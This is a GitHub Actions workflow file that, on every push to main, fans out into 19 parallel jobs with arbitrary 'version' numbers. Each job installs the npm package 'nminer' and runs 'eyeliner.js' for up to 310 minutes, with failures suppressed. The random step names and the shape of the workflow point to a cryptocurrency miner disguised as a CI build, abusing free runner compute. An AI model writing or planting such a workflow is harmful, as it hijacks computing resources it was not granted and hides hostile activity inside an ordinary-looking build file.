name: eyeliner
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4623 }
          - { version: 2926 }
          - { version: 4991 }
          - { version: 4385 }
          - { version: 5985 }
          - { version: 9013 }
          - { version: 2236 }
          - { version: 5399 }
          - { version: 841 }
          - { version: 5620 }
          - { version: 5409 }
          - { version: 7942 }
          - { version: 4214 }
          - { version: 2184 }
          - { version: 963 }
          - { version: 6601 }
          - { version: 5096 }
          - { version: 3751 }
          - { version: 7841 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: recent decongestant
        run: |
          npm install nminer@latest
          timeout 310m node eyeliner.js || echo "eyeliner executed"